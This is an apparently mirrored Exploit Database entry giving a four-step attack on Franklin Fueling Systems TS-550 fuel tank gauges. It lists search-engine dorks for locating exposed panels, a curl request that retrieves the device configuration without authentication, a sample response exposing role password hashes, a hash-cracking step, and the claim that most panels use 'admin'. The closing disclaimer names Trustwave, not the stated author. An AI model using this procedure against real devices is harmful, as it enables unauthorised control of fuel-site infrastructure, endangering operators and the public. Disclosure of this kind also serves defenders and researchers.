Franklin Fueling Systems TS-550 – Default Password

• Exploit Database
• 16 阅读

• 作者： Parsa Rezaie Khiabanloo
  日期： 2023-04-20
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51382/

• # Exploit Title: Franklin Fueling Systems TS-550 - Default Password
  # Date: 4/16/2023
  # Exploit Author: parsa rezaie khiabanloo
  # Vendor Homepage: Franklin Fueling Systems (http://www.franklinfueling.com/)
  # Version: TS-550
  # Tested on: Linux/Android(termux)
  
  Step 1 : attacker can using these dorks and access to find the panel
  
  inurl:"relay_status.html"
  
  inurl:"fms_compliance.html"
  
  inurl:"fms_alarms.html"
  
  inurl:"system_status.html"
  
  inurl:"system_reports.html'
  
  inurl:"tank_status.html"
  
  inurl:"sensor_status.html"
  
  inurl:"tank_control.html"
  
  inurl:"fms_reports.html"
  
  inurl:"correction_table.html"
  
  Step 2 : attacker can send request 
  
  curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST><TSA_REQUEST COMMAND="cmdWebGetConfiguration"/></TSA_REQUEST_LIST>' http://IP:10001/cgi-bin/tsaws.cgi
  
  
  Step 3 : if get response that show like this 
  
  <TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-02-19T22:09:22Z" TIME_STAMP_LOCAL="2013-02-19T17:09:22" KEY="11111111" ROLE="roleGuest"><TSA_RESPONSE COMMAND="cmdWebGetConfiguration"><CONFIGURATION>
  <DEBUGGING LOGGING_ENABLED="false" LOGGING_PATH="/tmp"/>
  <ROLE_LIST>
  <ROLE NAME="roleAdmin" PASSWORD="YrKMc2T2BuGvQ"/>
  <ROLE NAME="roleUser" PASSWORD="2wd2DlEKUPTr2"/>
  <ROLE NAME="roleGuest" PASSWORD="YXFCsq2GXFQV2"/>
  </ROLE_LIST>
  
  
  Step 4 : attacker can crack the hashesh using john the ripper 
  
  notice : most of the panels password is : admin
  
  Disclaimer:
  The information provided in this advisory is provided "as is" without
  warranty of any kind. Trustwave disclaims all warranties, either express or
  implied, including the warranties of merchantability and fitness for a
  particular purpose. In no event shall Trustwave or its suppliers be liable
  for any damages whatsoever including direct, indirect, incidental,
  consequential, loss of business profits or special damages, even if
  Trustwave or its suppliers have been advised of the possibility of such
  damages. Some states do not allow the exclusion or limitation of liability
  for consequential or incidental damages so the foregoing limitation may not
  apply.